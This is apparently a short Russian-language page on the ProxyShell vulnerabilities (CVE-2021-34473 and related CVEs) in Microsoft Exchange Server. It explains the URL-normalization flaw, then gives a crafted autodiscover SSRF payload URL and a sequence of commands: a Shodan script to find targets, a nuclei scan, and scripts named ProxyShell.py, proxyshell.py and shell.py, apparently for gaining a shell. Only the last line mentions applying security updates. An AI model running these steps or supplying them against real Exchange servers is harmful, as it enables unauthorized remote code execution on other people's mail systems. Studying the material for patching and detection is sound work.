
CVE-2021-34473 Microsoft Exchange Server Уязвимость удаленного выполнения кода
CVE-2021-34473 Microsoft Exchange Server Remote Code Execution Vulnerability. Эта некорректная нормализация URL позволяет нам получить доступ к произвольному backend URL при работе от имени учётной записи машины Exchange Server. Хотя эта уязвимость не так мощна, как SSRF в ProxyLogon, и мы могли манипулировать только частью пути URL, она всё же достаточно сильна, чтобы проводить дальнейшие атаки с произвольным доступом к backend.
Сканер nuclei для Proxyshell RCE (CVE-2021-34423,CVE-2021-34473,CVE-2021-31207), обнаруженный orange tsai на Pwn2Own, который влияет на Microsoft Exchange Server.
nuclei -u target.com -t proxyshell.yaml
https://xxx.xxx.xxx.xxx/autodiscover/[email protected]/mapi/nspi/?&Email=autodiscover/autodiscover.json%[email protected]
sudo python3 shodan-query.py
sudo python3 ProxyShell.py -u https://<IP>
python2 /manual/check.py
sudo python3 /manual/proxyshell.py
python2 /manual/shell.py
Примените обновления безопасности, найденные здесь: CVE-2021-34473